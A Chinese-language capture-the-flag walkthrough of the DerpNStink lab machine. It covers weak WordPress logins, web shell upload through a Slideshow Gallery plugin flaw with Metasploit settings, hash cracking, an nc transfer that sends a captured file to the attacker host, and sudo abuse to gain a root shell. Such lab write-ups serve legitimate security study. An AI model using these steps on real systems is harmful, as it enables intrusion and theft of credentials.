扫描存活主机和端口,发现开放了21、22、80端口
访问80端口如下:
查看源码发现/webnotes/info.txt
如下:
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live
于是我们需要修改/etc/hosts
文件
192.168.150.147 derpnstink.local
并在最下面找到flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
接着扫一下目录
发现robots.txt
访问如下:
再访问/temporary/
如下:
再访问/weblog/
可以看到是个wp站点,版本为4.6.9
并且扫到后台目录wp-admin
,尝试弱口令admin/admin成功登录
利用wpscan也可以得到账密admin/admin,并且扫描发现wp插件Slideshow Gallery旧版本1.4.6,这个版本存在文件上传漏洞可以利用
于是我们可以搜索一下该渗透模块
searchsploit Slideshow Gallery
直接利用该脚本上传文件
这里传个phpinfo可以发现成功了
再来手工打一下,上传php恶意代码,例如phpinfo
访问即可看到phpinfo页面
接着上传一句话成功连上蚁剑
在/home
目录下发现还存在mrderp
和stinky
用户
还可以利用msf来提权
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOSTS 192.168.150.147
set TARGETURI /weblog
set WP_PASSWORD admin
set WP_USER admin
在/var/www/html/weblog/
目录下的wp-config.php文件中找到数据库名wordpress
以及账密root/mysql
于是就可以成功登录phpmyadmin
在wp_posts
表中得到flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
并在wp_users表中发现还存在用户unclestinky/PBW6NTkFvboVVCHU2R9qmNai1WfHSC41
hashcat爆破发现爆不出来
再换john试试得到密码:wedgie57
登录该账号会发现用户权限更大了,并且直接能看到flag2
并且再尝试一下用该密码登录ftp或者ssh到前面获取的用户,发现stinky用户可以成功登录ftp,而ssh都无法登录
在/files/network-logs/
目录下发现了derpissues.txt
,是mrderp与stinky两个用户的对话如下:
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
在/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/
目录下发现key.txt
,是个ssh的私钥
然后利用key登录ssh,这里出现两个问题:一是权限问题,chmod 600 key.txt
即可解决;二是ssh证书失效,在登陆时添加命令-o PubkeyAcceptedKeyTypes=+ssh-rsa
即可解决。连上后在桌面文件发现flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
并在Documents
目录下发现derpissues.pcap
文件,于是通过nc将其下载下来
nc -lvvp 1234 > derpissues.pcap
nc -nv 192.168.150.128 1234 < derpissues.pcap
或者利用scp传输文件
scp -i key.txt stinky@192.168.150.147:/home/stinky/Documents/derpissues.pcap /root/derpissues.pcap
分析流量包,追踪http或者导出http可以发现密码:derpderpderpderpderpderpderp
接着使用该密码成功登录mrderp用户
在桌面发现helpdesk.log
文件如下:
从中发现有个自助网页:https://pastebin.com/RzK9WfGw,可以得到如下信息:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
于是我们先创建一个binaries
目录,再将/bin/bash
写入derpy.sh
文件并赋予最高权限后执行它
mkdir binaries
cd binaries
echo '/bin/bash' >> derpy.sh
chmod 777 derpy.sh
sudo ./derpy.sh
提权后在/root/Desktop目录下得到flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
后面发现其实可以直接利用cve-2021-4034来提权